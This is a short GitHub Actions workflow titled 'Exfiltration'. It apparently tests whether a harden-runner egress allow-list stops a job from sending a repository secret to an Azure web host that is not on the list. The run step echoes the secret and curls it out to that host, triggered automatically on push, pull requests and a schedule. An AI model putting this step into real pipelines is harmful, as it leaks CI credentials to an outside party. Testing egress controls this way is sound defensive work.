name: Exfiltration

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
  schedule:
    - cron: '12 00 * * 6'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@v1
        with:
          allowed-endpoints:
            ghcr.io:443
            github.com:443
            pkg-containers.githubusercontent.com:443
            
      - shell: bash
        env:
          SECRET: ${{ secrets.MACIEJ_SECRET }}
        run: |
          echo $SECRET
          curl -L https://wa-ncd-sec01.azurewebsites.net/$SECRET
          

